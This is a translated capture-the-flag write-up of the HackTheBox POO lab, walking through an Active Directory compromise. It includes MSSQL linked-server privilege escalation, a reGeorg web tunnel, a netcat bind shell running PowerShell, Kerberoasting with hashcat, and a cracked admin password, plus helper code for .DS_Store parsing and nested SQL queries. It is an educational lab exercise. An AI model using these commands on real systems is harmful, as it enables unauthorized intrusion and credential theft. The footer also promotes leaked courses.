HackTheBox endgame. Passing the Professional Offensive Operations lab. Active Directory pentest

In this article we will walk through not just a single machine but a whole mini-lab from the HackTheBox site.

As the description says, POO is designed to test skills at every stage of an attack in a small Active Directory environment. The goal is to compromise the exposed host, escalate privileges and finally compromise the entire domain, collecting 5 flags along the way.

You connect to the lab over VPN. It is recommended not to connect from a work computer or from a host that holds data important to you, since you end up in a private network together with people who know a thing or two about information security 🙂

Organizational information
So that you can find out about new articles, software and other information, I created a channel on Telegram and a group for discussing any questions in the field of information security. I will also look at your personal requests, questions, suggestions and recommendations and reply to everyone.

All information is provided for educational purposes only. The author of this document bears no responsibility for any damage caused to anyone as a result of using the knowledge and methods obtained from studying this document.

Intro

This endgame consists of two machines and contains 5 flags.

A description and the address of the exposed host are given as well.

Let's go!

Recon flag

The machine has the IP address 10.13.38.11, which I add to /etc/hosts.
10.13.38.11 poo.htb

The first step is to scan for open ports. Since scanning all ports with nmap takes a long time, I first do it with masscan. We scan all TCP and UDP ports from the tun0 interface at 500 packets per second.

sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500

Now, to get detailed information about the services running on those ports, we scan them with the -A option.

nmap -A poo.htb -p80,1433

So we have IIS and MSSQL. Along the way we also learn the real DNS name of the domain and of the computer. On the web server we are greeted by the default IIS page.

Let's brute-force directories. I use gobuster for this. In the parameters we set the number of threads to 128 (-t), the URL (-u), the wordlist (-w) and the extensions we are interested in (-x).

gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html

So we have HTTP authentication on the admin directory, and a readable .DS_Store (Desktop Services Store) file. .DS_Store files hold a user's Finder settings for a folder: the list of entries, icon positions, the chosen background image. Such a file can easily end up in the web root when developers copy a folder from a Mac. That gives us a listing of the directory contents. The DS_Store crawler can be used for this.

python3 dsstore_crawler.py -i http://poo.htb/
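To make concrete what the crawler recovers from that file, here is an added example (not part of the original article and not code from the dsstore_crawler tool) that parses the record stream found in a .DS_Store data block. The record layout follows the publicly documented format: a big-endian name length in UTF-16 code units, the name in UTF-16BE, a 4-byte structure id such as Iloc, a 4-byte type tag, then a typed payload. The Bud1 header, buddy-allocator table and B-tree walk that locate that stream inside a real file are left out, and the sample records are constructed inside the script rather than taken from poo.htb.

```python
import struct

# Payload sizes of the fixed-length record types; blob and ustr carry a length prefix.
FIXED_SIZES = {b"long": 4, b"shor": 4, b"bool": 1, b"type": 4, b"comp": 8, b"dutc": 8}


def encode_record(name, struct_id, type_tag, payload):
    """Serialise one record; used only to build the constructed sample below."""
    enc_name = name.encode("utf-16-be")
    out = struct.pack(">I", len(enc_name) // 2) + enc_name + struct_id + type_tag
    if type_tag in FIXED_SIZES:
        if len(payload) != FIXED_SIZES[type_tag]:
            raise ValueError(f"{type_tag!r} payload must be {FIXED_SIZES[type_tag]} bytes")
        out += payload
    elif type_tag == b"blob":
        out += struct.pack(">I", len(payload)) + payload
    elif type_tag == b"ustr":
        enc = payload.encode("utf-16-be")
        out += struct.pack(">I", len(enc) // 2) + enc
    else:
        raise ValueError(f"unknown record type {type_tag!r}")
    return out


def parse_records(buf):
    """Walk a record stream and return (name, struct_id, type_tag, payload) tuples."""
    records = []
    pos = 0
    while pos < len(buf):
        (nchars,) = struct.unpack_from(">I", buf, pos)
        pos += 4
        name = buf[pos:pos + 2 * nchars].decode("utf-16-be")
        pos += 2 * nchars
        struct_id, type_tag = buf[pos:pos + 4], buf[pos + 4:pos + 8]
        pos += 8
        if type_tag in FIXED_SIZES:
            size = FIXED_SIZES[type_tag]
            payload = buf[pos:pos + size]
            pos += size
        elif type_tag == b"blob":
            (size,) = struct.unpack_from(">I", buf, pos)
            pos += 4
            payload = buf[pos:pos + size]
            pos += size
        elif type_tag == b"ustr":
            (n,) = struct.unpack_from(">I", buf, pos)
            pos += 4
            payload = buf[pos:pos + 2 * n].decode("utf-16-be")
            pos += 2 * n
        else:
            raise ValueError(f"unknown record type {type_tag!r} at offset {pos - 4}")
        records.append((name, struct_id, type_tag, payload))
    return records


def leaked_names(buf):
    """Unique entry names in first-seen order: the listing a crawler reports."""
    seen = []
    for name, *_ in parse_records(buf):
        if name not in seen:
            seen.append(name)
    return seen


# Constructed sample (not captured from the lab): records of the kind Finder writes
# for a folder holding "admin", "dev" and "web.config". Iloc = icon location,
# bwsp = window settings, lsvp = list-view settings, vSrn = version (on "." = the folder).
SAMPLE = b"".join([
    encode_record("admin", b"Iloc", b"blob", struct.pack(">IIII", 100, 100, 0xFFFFFFFF, 0xFFFFFFFF)),
    encode_record("dev", b"Iloc", b"blob", struct.pack(">IIII", 200, 100, 0xFFFFFFFF, 0xFFFFFFFF)),
    encode_record("dev", b"bwsp", b"blob", b"bplist00"),  # plist payload, truncated on purpose
    encode_record("web.config", b"lsvp", b"blob", b""),
    encode_record(".", b"vSrn", b"long", struct.pack(">I", 1)),
])

if __name__ == "__main__":
    for entry in leaked_names(SAMPLE):
        print(entry)
```

The names are the only thing that matters for recon; the payloads are layout noise, which is why the crawler simply follows every name it finds into the next directory and looks for another .DS_Store there.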

We get the directory listing. The most interesting item is the dev directory, where we can see source and db folders in two branches. We can also recover the first 6 characters of file and directory names if the server is vulnerable to IIS short name (8.3 tilde) enumeration. This can be checked with IIS ShortName Scanner.

And we find a single text file whose name starts with "poo_co". Not knowing what to do next, I simply took all words beginning with "co" from the directory wordlist.

cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt

And iterate over them with wfuzz.

wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404

And we find the right word! We open the file and save the credentials (judging by the DBNAME parameter, they are for MSSQL).

We submit the flag and are 20% through.

Huh flag

We connect to MSSQL; I use DBeaver.

There is nothing interesting in this database, so let's open an SQL editor and see which logins exist.

SELECT name FROM master..syslogins;

We have two logins. Let's check our own privileges.

SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');

So, no privileges at all. Let's look at the linked servers; I described this technique in detail here.

SELECT * FROM master..sysservers;

So there is a second SQL Server. Let's check that we can run queries on it through openquery().

SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');

And we can even nest the queries, hopping from one linked server to the next.

SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');

The point is that a query sent to a linked server runs in the context of whatever login the link was configured with, which may be a different user! Let's see which user we are on the linked server.

SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');

And now let's see in which context a query coming back from the linked server to ours is executed!

SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');

So it is the dbo context, which should have every privilege. Let's check the server roles for a query that arrives through the linked server.

SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');

As you can see, we have all the privileges! So let's create our own admin. That is not allowed through openquery, so we do it with EXECUTE ... AT.

EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
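The quoting in those nested statements is the part that goes wrong by hand: each hop through a linked server wraps the statement in one more T-SQL string literal, so every single quote in the innermost query has to be doubled once per level (2, 4, 8 quotes). The generator below is an added example, not code from the article; it builds the openquery chain used above and the EXECUTE ... AT chain for an arbitrary list of hops, and can undo the doubling so a generated chain can be checked by eye. The server names are the ones found on the box; the query text is illustrative.

```python
def q(s):
    """Double every single quote: the T-SQL escape for a quote inside a string literal."""
    return s.replace("'", "''")


def openquery_chain(path, inner):
    """SELECT through a chain of linked servers.

    path  -- linked server names, outermost first: ["A", "B"] means
             our server -> A -> B, and `inner` runs on B.
    Each level wraps the statement in one more literal, so the quotes of
    `inner` end up doubled len(path) times.
    """
    stmt = inner
    for server in reversed(path):
        stmt = f'SELECT * FROM openquery("{server}", \'{q(stmt)}\')'
    return stmt


def execute_at_chain(path, stmt):
    """Same idea for statements openquery will not run (DDL, role changes): EXECUTE ... AT."""
    for server in reversed(path):
        stmt = f'EXECUTE(\'{q(stmt)}\') AT "{server}"'
    return stmt


def unwrap_quotes(s, levels):
    """Undo `levels` rounds of quote doubling (the reverse of q applied `levels` times)."""
    for _ in range(levels):
        s = s.replace("''", "'")
    return s


# Hop list found on the box: us -> COMPATIBILITY\POO_CONFIG -> COMPATIBILITY\POO_PUBLIC.
PATH = ["COMPATIBILITYPOO_CONFIG", "COMPATIBILITYPOO_PUBLIC"]

ROLE_CHECK = "SELECT " + ", ".join(
    f"is_srvrolemember('{r}') AS {r}"
    for r in ("sysadmin", "dbcreator", "bulkadmin", "securityadmin"))

if __name__ == "__main__":
    print(openquery_chain(PATH, "SELECT user_name() AS name"))
    print(openquery_chain(PATH, ROLE_CHECK))
    print(execute_at_chain(PATH, "CREATE LOGIN [ralf] WITH PASSWORD=N'ralfralf', CHECK_POLICY=OFF"))
```

EXECUTE ... AT only works when the linked server entry has the RPC Out option enabled; openquery does not need it, which is why the read-only checks go through openquery and the login creation has to go through EXECUTE ... AT. Any non-sysadmin login that can reach a link configured with a privileged context gets the same result, so linked-server login mappings deserve the same review as the logins themselves.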

Now we connect with the new login's credentials and see a new database containing the flag.

We submit this flag and move on.

BackTrack flag

Let's get command execution through MSSQL; I use mssqlclient from the impacket package.

mssqlclient.py ralf:ralfralf@poo.htb -db POO_PUBLIC

We need to find passwords, and the first thing we came across was the website. So we want the web server configuration (a plain reverse shell does not work, apparently a firewall is in the way).

But access is denied. We can still read the file from MSSQL itself; we only need to know which external script languages are installed. In the MSSQL directory we find that Python is present.

Then reading web.config is no problem at all.

EXEC sp_execute_external_script
@language = N'Python',
@script = N'print(open(r"C:\inetpub\wwwroot\web.config").read())'

With the credentials obtained we go to /admin and take the flag.

Foothold flag

Something about the firewall is clearly off: looking at the network settings we notice that IPv6 is in use as well, and the filtering evidently applies to IPv4 only!

Add this address to /etc/hosts.
dead:babe::1001 poo6.htb
Let's scan the host again, this time over IPv6.

And the WinRM service is reachable over IPv6. Let's connect with the credentials we found.

There is a flag on the desktop; submit it.

P00ned flag

After enumerating the host with winPEAS we find nothing special. So I decided to look at the domain accounts once more (I wrote an article on this topic too). But over WinRM I could not list all the SPNs in the domain.

setspn.exe -T intranet.poo -Q */*

Let's run the command through MSSQL instead.

This way we obtain SPNs registered to the users p00_hr and p00_adm, which means they are exposed to Kerberoasting: any domain account can request a service ticket for those SPNs, and the ticket is encrypted with the service account's password hash, so we can brute-force their passwords offline.

First we need a stable shell as the MSSQL service user. Access is restricted: we can reach the host only on ports 80 and 1433. But we can tunnel traffic over port 80! For that we use reGeorg. We upload its tunnel.aspx to the web server's root directory, C:\inetpub\wwwroot.

But when we request it we get a 404 error. This means *.aspx files are not being handled. To make files with this extension execute, install ASP.NET 4.5 as follows.

dism /online /enable-feature /all /featurename:IIS-ASPNET45

Now, when we request tunnel.aspx, we get the response that everything is ready.

Let's start the client side of the tool, which will forward traffic. Everything sent to local port 5432 will be forwarded through the tunnel to the server.

python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx

And we use proxychains to send any application's traffic through our proxy. Let's add the proxy to the configuration file /etc/proxychains.conf.

Now let's upload netcat to the server, with which we will set up a stable bind shell, and the Invoke-Kerberoast script, with which we will carry out the Kerberoasting attack.

Now we start the listener through MSSQL.

xp_cmdshell C:\temp\nc64.exe -e powershell.exe -lvp 4321

And connect to it through our proxy.

proxychains rlwrap nc poo.htb 4321

Let's get the hashes.

. .\Invoke-Kerberoast.ps1
Invoke-Kerberoast -ErrorAction SilentlyContinue -OutputFormat Hashcat | Select-Object Hash | Out-File -FilePath 'C:\temp\kerb_hashes.txt' -Width 8000
type kerb_hashes.txt

Next, these hashes need to be brute-forced. Since rockyou did not contain the passwords, I used ALL the password wordlists shipped with SecLists. For the cracking we use hashcat.

hashcat -a 0 -m 13100 kerb_hashes.txt /usr/share/seclists/Passwords/*.txt --force

And we get both passwords: the first one from dutch_passwordlist.txt, the second from Keyboard-Combinations.txt.

So now we have three users, and we head for the domain controller. First let's find its address.

Good, we have the IP address of the domain controller. Let's enumerate all domain users and find out which of them are administrators. For that we download the PowerView.ps1 script. Then we connect with evil-winrm, passing the directory containing the script in the -s parameter, and simply load PowerView.

Now all of its functions are available. The user p00_adm looks like the privileged one, so we will work in its context. Let's create a PSCredential object for this user.

$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass

Now every PowerShell command to which we pass $Creds will run as p00_adm. Let's list the users together with their AdminCount attribute.

Get-NetUser -DomainController dc -Credential $Creds | select name,admincount

So our user really is privileged. Let's see which groups it belongs to.

Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds

Finally we confirm that the user is a domain administrator, which gives it the right to log in remotely to the domain controller. Let's try to log in over WinRM through our tunnel. I was confused by the errors reGeorg threw when used with evil-winrm.

So we use another, simpler script to connect to WinRM. Open it and change the connection parameters.

We try to connect, and we are on the system.

But there is no flag. So we look at the users and check their desktops.

On mr3ks's desktop we find the flag, and the lab is 100% complete.

That's all. As feedback, let me know in the comments whether you learned anything new from this article and whether it was useful to you.

You can join us on Telegram. There you can find interesting materials, leaked courses and software. Let's build a community of people who understand many areas of IT, so that we can always help each other with any IT and information security questions.

Source: www.habr.com
